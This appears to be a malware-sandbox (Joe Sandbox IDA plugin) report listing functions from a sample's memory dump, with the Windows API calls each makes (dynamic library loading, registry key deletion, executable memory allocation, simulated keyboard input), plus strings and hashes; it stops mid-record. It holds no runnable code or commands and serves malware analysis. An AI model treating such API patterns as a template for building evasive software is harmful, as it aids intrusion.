Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: c03b5f3529840aa017b0060043e99479698ba00cdb2b75bd41f93a26f1a48ab6
Instruction ID: 6e2724b000ab91f761ee47e42a3d856263e5b4cda0e402b7752f662980a04a85
Opcode Fuzzy Hash: c03b5f3529840aa017b0060043e99479698ba00cdb2b75bd41f93a26f1a48ab6
Instruction Fuzzy Hash: 11D0A7344043138FDB205F31EC48E1637E4AF08318B29C42DF556D2250DBB0D8808670

Function 00D813A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00D81371,?,00D81519), ref: 00D813B4
GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00D813C6

Strings

UnRegisterTypeLibForUser, xrefs: 00D813C0
oleaut32.dll, xrefs: 00D813AF

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: UnRegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1587604923
Opcode ID: 5b27354e529dd66613c4270baaac1dd201e84ccc24e3243fa1df326417adf414
Instruction ID: e31524d0a79a1c2295a78dacf7166cf6d59a36d8685b4dcb8f28e98f122f97f5
Opcode Fuzzy Hash: 5b27354e529dd66613c4270baaac1dd201e84ccc24e3243fa1df326417adf414
Instruction Fuzzy Hash: EBD0A734400313AFD7201F25EC08A1136EDAF40305F09842DE555D1660DA70C4898730

Function 00D8137B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,?,00D8135F,?,00D81440), ref: 00D81389
GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00D8139B

Strings

oleaut32.dll, xrefs: 00D81384
RegisterTypeLibForUser, xrefs: 00D81395

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1071820185
Opcode ID: ed167269c3074123c8aac3e0ac8932aa0239df89eb98536b074fe9233078a171
Instruction ID: 22faa3973130a288604857494a611f50ef85004e8e859ab9a7dd3a7c6751c9f2
Opcode Fuzzy Hash: ed167269c3074123c8aac3e0ac8932aa0239df89eb98536b074fe9233078a171
Instruction Fuzzy Hash: 5CD0A7348007139FD7203F25EC08B5136D8AF04305F0E842EE585D1650DA70C48D8730

Function 00DA3ACC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00DA3AC2,?,00DA3CF7), ref: 00DA3ADA
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00DA3AEC

Strings

advapi32.dll, xrefs: 00DA3AD5
RegDeleteKeyExW, xrefs: 00DA3AE6

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: dbcb3a279139fdb95664630fffe79848f5b8dc610b42b79d06a3ab8f35c5fe26
Instruction ID: f06cfe9e6cfbf2874798deade24ca7018183a5facbddde6cebc56213ac0e214f
Opcode Fuzzy Hash: dbcb3a279139fdb95664630fffe79848f5b8dc610b42b79d06a3ab8f35c5fe26
Instruction Fuzzy Hash: 61D0A930401B238FD7209F26EC0DA9236E9AF12314B09842DF5D5D2250EFF0C8C08A70

Function 00D4AA70 Relevance: 6.3, APIs: 4, Instructions: 300COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,00D96AA6), ref: 00D4AB2D
_wcscmp.LIBCMT ref: 00D4AB49

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: BuffCharUpper_wcscmp
String ID:
API String ID: 820872866-0
Opcode ID: 17d04a49f724b4d5c3cb02a70930ed80cb1d41862f664b006b0f9ade98855e69
Instruction ID: f9eb9dc1ffe6c53df2771d64e7273244e4ddf9e087b0f09d8904bd71457bcd43
Opcode Fuzzy Hash: 17d04a49f724b4d5c3cb02a70930ed80cb1d41862f664b006b0f9ade98855e69
Instruction Fuzzy Hash: 57A1E375B4020ADBDB14DF69E9816BDBBA5FF48300F64416AEC56C72A0DB30D860C7B2

Function 00DA0D01 Relevance: 6.3, APIs: 4, Instructions: 300memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00DA0D85
CharLowerBuffW.USER32(?,?), ref: 00DA0DC8

Part of subcall function 00DA0458: CharLowerBuffW.USER32(?,?,?,?), ref: 00DA0478

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00DA0FB2
_memmove.LIBCMT ref: 00DA0FC2

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 314ac7fd415a4ed968986a97b11815e7ac4ca2642f13059501026bbc2f123821
Instruction ID: adbf3bcb3e75745e7d698183c1b0acad17926d6e1050f9a1f1aeb76368a0fd55
Opcode Fuzzy Hash: 314ac7fd415a4ed968986a97b11815e7ac4ca2642f13059501026bbc2f123821
Instruction Fuzzy Hash: C2B180756043018FC714DF28C48096ABBE5EF8A754F18896EF889DB352DB31ED45CBA2

Function 00D9AF26 Relevance: 6.3, APIs: 4, Instructions: 268COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00D9AF56
CoUninitialize.COMBASE ref: 00D9AF61

Part of subcall function 00D81050: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00D810B8

VariantInit.OLEAUT32(?), ref: 00D9AF6C
VariantClear.OLEAUT32(?), ref: 00D9B23F

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 844986c057a463565bd26349680749675505fb89f1b1d383bfc7bc7fdc8b6dfc
Instruction ID: c507e4625f4afff96e95bf673ac9e8bdec687758fa8463ac5bf5aab31adb337f
Opcode Fuzzy Hash: 844986c057a463565bd26349680749675505fb89f1b1d383bfc7bc7fdc8b6dfc
Instruction Fuzzy Hash: 72A125356047019FCB10DF14C991B2AB7E5FF89360F058459F99AAB3A1DB30ED44CBA6

Function 00D4C320 Relevance: 6.3, APIs: 4, Instructions: 259fileCOMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00D4C419
ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,00D86653,?,?,00000000), ref: 00D4C495

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: FileRead_memmove
String ID:
API String ID: 1325644223-0
Opcode ID: d58cee450142a3243a6c9a3bc218cba5a3a0c668bb83bf588a43bb65863f22d4
Instruction ID: f154adbbd480c68fcdfbe5c568d218d457dba4191467651c7707de3c46054891
Opcode Fuzzy Hash: d58cee450142a3243a6c9a3bc218cba5a3a0c668bb83bf588a43bb65863f22d4
Instruction Fuzzy Hash: 12A1AD70A04605EBDF40CF59C984BA9FBB0FF05300F18C195E8A9DA296D735E960CBB1

Function 00D642EB Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D64347
_memcpy_s.LIBCMT ref: 00D643B9
__filbuf.LIBCMT ref: 00D6443A
_memset.LIBCMT ref: 00D6447E

Part of subcall function 00D6889E: __getptd_noexit.LIBCMT ref: 00D6889E

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit_memcpy_s
String ID:
API String ID: 3877424927-0
Opcode ID: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
Instruction ID: 9e3771f5737e3cc1294a5173aaa968c70f57cb766b0767c1448ecf850b9b0896
Opcode Fuzzy Hash: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
Instruction Fuzzy Hash: CA51A030A00705DBDB249FA988816AE7BA5EF41320F288729F875972D0DBB1ED519B70

Function 00DAC2E7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00DAC354
ScreenToClient.USER32(?,00000002), ref: 00DAC384
MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00DAC3EA

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: ff43de6ef4503275d9671065c33ffd767e94f13bfb3da27bdf211fa944d9079d
Instruction ID: a52f40361d54178aac70459be8b613200f4a34e16b101940ea5118ce348132f1
Opcode Fuzzy Hash: ff43de6ef4503275d9671065c33ffd767e94f13bfb3da27bdf211fa944d9079d
Instruction Fuzzy Hash: CE517E31910209EFCF10DF68C980AAE7BB6FB4A320F149559F8159B290D770ED81CBA0

Function 00D7D206 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00D7D258
__itow.LIBCMT ref: 00D7D292

Part of subcall function 00D7D4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00D7D549

SendMessageW.USER32(?,0000110A,00000001,?), ref: 00D7D2FB
__itow.LIBCMT ref: 00D7D350

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 07dc677327905d654f0d971080fb2364ed264a45a3a85768cab3d070316f32ae
Instruction ID: 82ab3a41e646212fd8d3b19ab0a177e90517fb4fd8d167b0bf4844a3feafad14
Opcode Fuzzy Hash: 07dc677327905d654f0d971080fb2364ed264a45a3a85768cab3d070316f32ae
Instruction Fuzzy Hash: 2241A271A00609AFDF15DF54C842FEE7BBAEF49700F044019FA09A3292EB759A45CB76

Function 00D8EE88 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00D8EF32
GetLastError.KERNEL32(?,00000000), ref: 00D8EF58
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00D8EF7D
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00D8EFA9

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: f8fca7756da7916aa8c24402d0c520d9102839d3189dd17b6bedb121bb61d8e1
Instruction ID: 7257912685f5676fc13f5a2874cadb8331087630f8a136204056a7487063c40d
Opcode Fuzzy Hash: f8fca7756da7916aa8c24402d0c520d9102839d3189dd17b6bedb121bb61d8e1
Instruction Fuzzy Hash: 3F411739600611DFCB11EF15C944A5DBBE6EF89360B198098ED4AAF362DB30FD40DBA1

Function 00DAB354 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00DAB3E1

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 1bab5727df4b38f7f92537553022b381c1c28b68776cfda8428ca4c8569c0b63
Instruction ID: e1fc5fd57482ff1098bde23ecb9f8581d278d47e6f7c68f4b0ede53c80f32285
Opcode Fuzzy Hash: 1bab5727df4b38f7f92537553022b381c1c28b68776cfda8428ca4c8569c0b63
Instruction Fuzzy Hash: 2231A334600205EFEF249B58CC95FA83765EB0B374F188513FA91D62A3C7B5D9829B71

Function 00DAD5EE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00DAD617
GetWindowRect.USER32(?,?), ref: 00DAD68D
PtInRect.USER32(?,?,00DAEB2C), ref: 00DAD69D
MessageBeep.USER32(00000000), ref: 00DAD70E

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 99af4c92d755eb9253496da9bca7dee847751121db40cc47262f860e47086a3d
Instruction ID: 567cb39c1b4ed471a3e3ba8757169e0d90a49b518d37385d7c29e88f0048171e
Opcode Fuzzy Hash: 99af4c92d755eb9253496da9bca7dee847751121db40cc47262f860e47086a3d
Instruction Fuzzy Hash: 51416A31A00219DFCB15CF59D880BA97BF6BB4A300F1881AAE45A9F651D731E945CB60

Function 00D84497 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00D844EE
SetKeyboardState.USER32(00000080,?,00008000), ref: 00D8450A
PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00D8456A
SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00D845C8

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 357d8df5e9022b9bae70048f590935e7f0a857f48c8367db2580163c38863f8c
Instruction ID: b1e30d410fe6c3b0e5ef3deefc7033ee33450bbb390fac288c9d8cf1411da29e
Opcode Fuzzy Hash: 357d8df5e9022b9bae70048f590935e7f0a857f48c8367db2580163c38863f8c
Instruction Fuzzy Hash: D331E7B190425A6FEF34AB649808BFE7BB59B46714F0801AAF4C5922C1C774DA44D771

Function 00D74DB4 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00D74DE8
__isleadbyte_l.LIBCMT ref: 00D74E16
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00D74E44
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00D74E7A

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
